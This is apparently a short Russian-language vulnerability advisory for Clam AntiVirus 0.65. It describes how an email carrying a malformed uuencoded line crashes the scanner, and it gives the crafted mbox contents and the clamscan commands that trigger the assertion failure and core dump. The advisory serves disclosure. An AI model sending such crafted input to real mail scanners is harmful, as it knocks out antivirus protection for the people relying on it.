Программа: Clam AntiVirus 0.65
Уязвимость обнаружена в Clam AntiVirus. Удаленный пользователь может аварийно завершить работу программы.
Удаленный пользователь может послать email сообщение, содержащее uuencoded строку с некорректным значением длины через email сообщение, чтобы аварийно завершить работу антивируса.
Пример:
>How-To-Repeat:
Save the following file to ~/clamtest.mbox, removing the leading 'X':
XFrom -
Xbegin 644 byebye
Xbyebye
Xend
Then do:
# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", lin
e 887
Abort (core dumped)
or
# clamdscan -v ~/clamtest.mbox; ps ax | grep clam